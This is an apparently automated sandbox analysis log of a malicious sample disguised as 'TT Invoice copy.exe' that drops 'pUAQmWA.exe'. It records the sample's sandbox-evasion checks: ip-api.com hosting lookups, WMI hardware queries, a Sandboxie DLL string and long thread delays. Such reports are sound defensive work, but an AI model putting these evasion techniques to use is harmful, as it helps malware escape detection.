                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe; Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe; Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: DC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 87D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 97D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 99D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: A9D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 1010000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 2C80000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: 1030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 2310000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 2490000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 4490000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 80E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 6960000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 80E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 16C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 32D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory allocated: 3190000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4626
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7971
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 836
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Window / User API: threadDelayed 2383
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Window / User API: threadDelayed 2566
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Window / User API: threadDelayed 3944
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Window / User API: threadDelayed 543
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 6896 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 | Thread sleep count: 4626 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 | Thread sleep count: 158 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624 | Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7672 | Thread sleep count: 2383 > 30
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99874s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7672 | Thread sleep count: 2566 > 30
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99532s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99422s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99297s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99188s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -99063s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98953s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98843s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98734s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98623s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98481s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98328s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98215s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98109s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -98000s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97891s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97766s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97641s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97529s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97422s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97313s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -97188s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7996 | Thread sleep count: 3944 > 30
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7996 | Thread sleep count: 543 > 30
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99546s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99327s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99218s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -99000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98670s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98343s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98125s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -98015s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -97906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -97797s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -97687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99874
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99765
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99656
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99532
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99422
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99297
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99188
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 99063
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98953
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98843
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98734
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98623
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98481
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98328
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98215
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98109
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 98000
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97891
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97766
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97641
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97529
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97422
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97313
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 97188
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99875
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99765
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99656
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99546
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99437
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99327
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99218
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99109
